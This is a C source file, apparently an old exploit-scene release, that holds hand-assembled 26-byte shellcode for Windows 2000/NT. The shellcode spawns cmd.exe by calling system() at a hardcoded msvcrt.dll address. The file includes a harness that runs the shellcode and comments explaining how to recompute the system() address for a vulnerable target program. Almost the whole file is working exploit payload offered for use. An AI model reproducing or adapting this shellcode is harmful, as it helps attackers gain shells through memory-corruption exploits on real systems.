// very smaal win2000/NT local shellcode (smaalest i've seen)
//
// tested on win2000 server sp0 with VC++ 6.0
//
// you may need to change the adress of system
// to get it you need two tools from vc++ or masm32 
// therse tools called listdlls.exe and dumpbin.exe
// in dos shell type:
//	 listdlls vunl.exe 				(search base adress of msvcrt.dll)
//	dumpbin /exports c:\winnt\system32\msvcrt.dll 	(search offset of system)
//	add there offsets together and change it in the code
//
//	written by newroot
// 


#include <windows.h>
#include <winbase.h>


/* 26byte execute system("cmd.exe "); written by newroot */ 
unsigned char hellcode[]=
	"\x8b\xec"				//	mov	ebp, esp
	"\x55"					//	push	ebp
	"\x8b\xec"				//	mov	ebp, esp
	"\x68\x65\x78\x65\x20"			//	push    0x20657865
	"\x68\x63\x6d\x64\x2e"			//	push    0x2e646d63
	"\x8d\x45\xf8"				//	lea     eax,[ebp-0x8]
	"\x50"					//  	push    eax
	"\xb8"					//	mov	eax, 
	"\xad\xaa\x01\x78"			//	0x7801aaad <- adress of system()
	"\xff\xd0"				//  	call    eax
	;


int main (int argc, char **argv)
{
	void (*func)();        

	LoadLibrary("msvcrt.dll");
	func =  (void *) hellcode;
	func();
	
	return 0;
}